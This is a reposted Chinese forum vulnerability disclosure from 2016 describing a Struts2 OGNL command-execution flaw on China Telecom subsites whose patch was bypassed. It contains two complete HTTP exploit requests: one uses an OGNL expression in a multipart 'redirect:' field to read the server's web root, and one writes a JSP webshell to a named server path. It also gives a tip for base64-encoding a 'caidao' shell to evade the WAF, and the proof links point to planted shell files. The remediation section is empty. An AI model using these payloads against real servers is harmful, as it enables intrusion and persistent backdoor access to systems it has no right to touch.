HanDs
管理员

[7月漏洞公开] 中国电信多个分站命令执行漏洞修复不当(绕过waf写webshell) 



中国电信多个分站命令执行漏洞修复不当(绕过waf写webshell)

详细说明:

http://**.**.**.**:8080/emallTelOmsWeb/sysmgr/login/login.action

**.**.**.**/integrateSys/checkNum.action

**.**.**.**/item/queryGoods.action





code 区域
GET /emallTelOmsWeb/sysmgr/login/login.action HTTP/1.1
Host: **.**.**.**:8080
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=389b3f46292c4ee795f3f64e37d6f4db
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: JSESSIONID=7162A0058CDFF12F9D688291EFBF381F.b; TS01861ca2=018ac74bc404a46a20c97c350297187bbcdf602fb91b78c975361bc471aa231694a2486bb64c9a6ed89eb0460f926333cf4b4fecbf; TS01c98fdf=018ac74bc4d91c43f67f047b17a9d4eb3155e36b7aaee0491e3d4485516646565a63b75a7e
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alx-4.0
Content-Length: 220

--389b3f46292c4ee795f3f64e37d6f4db
Content-Disposition: form-data; name="redirect:/${(#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/"))}"

-1
--389b3f46292c4ee795f3f64e37d6f4db--





可以getshell

code 区域
GET /emallTelOmsWeb/sysmgr/login/login.action HTTP/1.1
Host: **.**.**.**:8080
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=389b3f46292c4ee795f3f64e37d6f4db
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: JSESSIONID=7162A0058CDFF12F9D688291EFBF381F.b; TS01861ca2=018ac74bc404a46a20c97c350297187bbcdf602fb91b78c975361bc471aa231694a2486bb64c9a6ed89eb0460f926333cf4b4fecbf; TS01c98fdf=018ac74bc4d91c43f67f047b17a9d4eb3155e36b7aaee0491e3d4485516646565a63b75a7e
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alx-4.0
Content-Length: 1750

--389b3f46292c4ee795f3f64e37d6f4db
Content-Disposition: form-data; name="redirect:/${"x"+(new **.**.**.**.PrintWriter("/home/ecss/emallTelOmsWeb8083/webapps/emallTelOmsWeb/s.jsp")).append("小马十六进制编码").close()}"

-1
--389b3f46292c4ee795f3f64e37d6f4db--







然后写入菜刀马(小马base64加密提交即可绕过waf)



漏洞证明:

http://**.**.**.**:8080/emallTelOmsWeb/f.jsp?z0=utf-8

**.**.**.**/s.txt

**.**.**.**/s.txt

屏幕快照 2016-05-30 下午3.17.54.png

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
中国
#1楼
发帖时间:2016-7-16   |   查看数:0   |   回复数:0
游客组
快速回复